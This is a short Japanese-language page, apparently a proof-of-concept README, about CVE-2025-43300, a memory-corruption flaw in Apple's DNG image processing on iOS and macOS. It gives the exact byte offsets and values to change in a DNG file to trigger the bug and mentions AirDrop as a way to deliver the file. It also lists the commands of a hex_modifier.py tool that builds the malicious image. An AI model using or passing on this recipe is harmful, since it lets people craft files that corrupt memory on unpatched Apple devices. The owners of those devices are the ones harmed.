
CVE-2025-43300: iOS/macOS DNG画像処理におけるメモリ破損
CVE-2025-43300: iOS/macOS DNG画像処理におけるメモリ破損
Appleの画像処理(RawCamera.bundle)の脆弱性がiOS 18.6.1およびmacOSに影響します。この問題は、DNGファイルにTIFFメタデータとJPEGロスレスパラメータの不一致がある場合に発生し、メモリ破損を引き起こします。
DNG解像度の画像をダウンロード
以下のバイトを変更:
0x2FD00: 01 -> 02
0x3E40B: 02 -> 01
AirDropなど
# Create POC using known vulnerable offsets
python3 hex_modifier.py create-poc <input.dng>
# Manual byte modification
python3 hex_modifier.py modify <input.dng> <offset> <old_byte> <new_byte> <output.dng>
# Generate diff report
python3 hex_modifier.py diff <original.dng> <modified.dng>